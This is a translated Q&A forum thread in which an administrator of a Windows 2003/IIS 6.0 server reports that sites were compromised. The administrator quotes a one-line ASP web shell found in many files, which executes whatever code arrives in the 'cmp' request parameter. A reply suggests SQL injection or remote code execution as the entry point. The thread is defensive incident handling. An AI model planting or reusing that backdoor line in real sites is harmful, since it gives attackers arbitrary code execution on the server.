2013-10-07 1 views
1

Один из моих клиентов заметил сообщение в результатах поиска Google, в котором говорится, что их сайт, возможно, был взломан. После некоторого копания я нашел html-файлы на сервере, содержащие ссылки на мусор и javascript. Я удалил эти файлы, изменять пароли К, обновляются некоторые компоненты, такие как CKFinder и т.д ...Я думаю, что я был взломан и искал совет

тогда я начал искать в другие сайты на сервере и нашел тонну файлов .asp с этой линией

<%If Request("cmp")<>"" Then Execute(Request("cmp"))%>nofoundfile 

Я удалил их, но не знаю, как они туда попали. Я просмотрел различные журналы (просмотр событий, веб-сайт, ftp), но большинство из них не возвращаются достаточно далеко от того, когда были созданы файлы.

Я обновил ОС, который был всего лишь месяц или два устарел, и изменил доступ к ftp.

Что еще я могу сделать, чтобы найти точку входа или убедиться, что мой сервер и сайты в безопасности?

BTW: Это сервер Windows 2003 с IIS 6.0.

+0

Windows 2003 является «только через месяц или два из даты»? – geoffspear

+0

Ссылаясь на обновления Windows ... – SirM

ответ

0

Существует несколько способов доступа к вашему серверу.

Вы используете обычную CMS или обычай? Возможно, они обнаружили уязвимость в одном из ваших скриптов.

например, если они обнаружили уязвимость в SQL-инъекции, они могут извлекать информацию о базе данных. Если они найдут ошибку RCE (удаленное выполнение кода), они, возможно, смогли выполнить системные команды, ведущие к созданию этих произвольных файлов.

Кроме того, есть несколько уязвимостей в сервере окон, которые были заплатками на этой неделе, проверить эту ссылку: http://blog.spiderlabs.com/2014/02/microsoft-patch-tuesday-february-2014.html